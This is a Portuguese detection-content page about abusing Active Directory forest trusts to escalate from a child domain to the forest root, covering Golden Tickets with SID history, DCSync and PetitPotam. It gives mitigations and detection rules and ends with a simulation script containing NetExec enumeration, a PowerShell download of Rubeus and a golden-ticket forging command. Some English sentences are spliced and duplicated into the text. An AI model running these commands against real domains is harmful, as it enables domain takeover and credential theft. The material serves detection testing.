Abuso de Confiança da Floresta do Active Directory e Escalonamento de Child-to-Root
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Este walkthrough técnico mostra como um atacante com privilégios de Administrador de Domínio em um domínio filho pode escalar para controle administrativo da Raiz da Floresta. O ataque abusa de confianças intra-floresta bidirecionais e filtragem de SID permissiva para injetar SIDs de Administradores Empresariais em tickets Kerberos forjados. Também explica como métodos de coerção como PetitPotam podem ser utilizados para capturar tickets de conta de máquina e habilitar ataques DCSync.
Investigação
O relatório descreve um engajamento baseado em laboratório em que o atacante começa no domínio filho pentest.ignite.local. O fluxo de trabalho inclui enumerar as confianças da floresta, extrair o hash krbtgt , forjar um Golden Ticket com Histórico de SID e executar um ataque DCSync contra o domínio pai ignite.local. Um caminho de escalada secundário usando a técnica de coerção PetitPotam também é demonstrado.
Mitigação
As mitigações recomendadas incluem tratar todos os controladores de domínio como ativos de nível zero e girar a senha duas vezes regularmente em toda a floresta. As organizações devem impor a filtragem de SID em confianças, desabilitar delegação irrestrita e desligar o serviço de Spooler de Impressão em controladores de domínio. Passos adicionais de reforço incluem usar o grupo de Usuários Protegidos para proteção do Kerberos e monitorar atividades anormais de replicação DRSUAPI. krbtgt password twice on a regular basis across the forest. Organizations should enforce SID filtering on trusts, disable unconstrained delegation, and turn off the Print Spooler service on domain controllers. Additional hardening steps include using the Protected Users group for Kerberos protection and monitoring for abnormal DRSUAPI replication activity.
Resposta
Se for detectada atividade DCSync ou uso não autorizado de tickets Kerberos, os respondedores devem imediatamente isolar os controladores de domínio impactados e iniciar uma redefinição dupla de senha. Todas as contas com privilégios de Administrador Empresarial devem ser investigadas, e o ambiente deve ser verificado para ferramentas como Rubeus ou PetitPotam. Os logs de autenticação também devem ser revisados para comportamento incomum de conta de máquina e possíveis eventos relacionados à coerção. krbtgt password reset. All accounts with Enterprise Admin privileges should be investigated, and the environment should be checked for tools such as Rubeus or PetitPotam. Authentication logs should also be reviewed for unusual machine account behavior and possible coercion-related events.
Fluxo de Ataque
Detecções
Provável Uso de Ferramentas Hack do Windows [Parte3] (via file_event)
Visualizar
Detecção de Abuso de Confiança de Floresta do Active Directory [Log de Evento de Segurança do Microsoft Windows]
Visualizar
Abuso de Confiança de Floresta do Active Directory: Escalada do Domínio Filho para Raiz [Criação de Processo do Windows]
Visualizar
Execução de Simulação
Pré-requisito: O Check de Pré-voo de Telemetria & Base deve ter passado.
Racional: Esta seção detalha a execução precisa da técnica de adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos incorretos.
-
Narrativa do Ataque & Comandos: O adversário obteve um ponto de apoio em um domínio filho (
domínio filho pentest.ignite.local.). Para escalar para a raiz da floresta, eles primeiro usamnxc(NetExec) para listar Controladores de Domínio via LDAP para mapear o ambiente alvo. Em seguida, usampowershellpara baixarRubeus.exede um servidor remoto controlado pelo atacante. Finalmente, eles executamRubeus.exepara forjar um Golden Ticket. O ticket forjado contém o SID do domínio raiz da floresta (S-1-5-21-2964257136-1039789743-457275023) para permitir que o adversário se passe por um administrador da floresta ao interagir com o domínio raiz. -
Script de Teste de Regressão:
# Simulação de Abuso de Confiança de Floresta para acionar a regra Sigma específica # 1. Simular Enumeração LDAP NetExec # Nota: Chamamos 'nxc' via uma execução de teste para imitar a assinatura da linha de comando Start-Process "cmd.exe" -ArgumentList "/c nxc ldap -u raaz -p Password@2 --dc-list" -NoNewWindow # 2. Simular Download de Rubeus via PowerShell # Isso corresponde à string exata: 'powershell wget http://Rubeus.exe -o Rubeus.exe' Start-Process "powershell.exe" -ArgumentList "wget http://Rubeus.exe -o Rubeus.exe" -NoNewWindow # 3. Simular Forjamento de Golden Ticket com Rubeus # Isso corresponde à string complexa exata exigida pela regra de detecção $rubeusCmd = "Rubeus.exe golden /rc4: /user:administrator /domain:pentest.ignite.local /sid:S-1-5-21-3430543386-541733547-1396883976 /sids:S-1-5-21-2964257136-1039789743-457275023-519 /outfile:ticket" Start-Process "cmd.exe" -ArgumentList "/c $rubeusCmd" -NoNewWindow -
Comandos de Limpeza:
# Remover o arquivo Rubeus baixado e quaisquer artefatos de teste Remove-Item -Path "Rubeus.exe" -ErrorAction SilentlyContinue Remove-Item -Path "ticket" -ErrorAction SilentlyContinue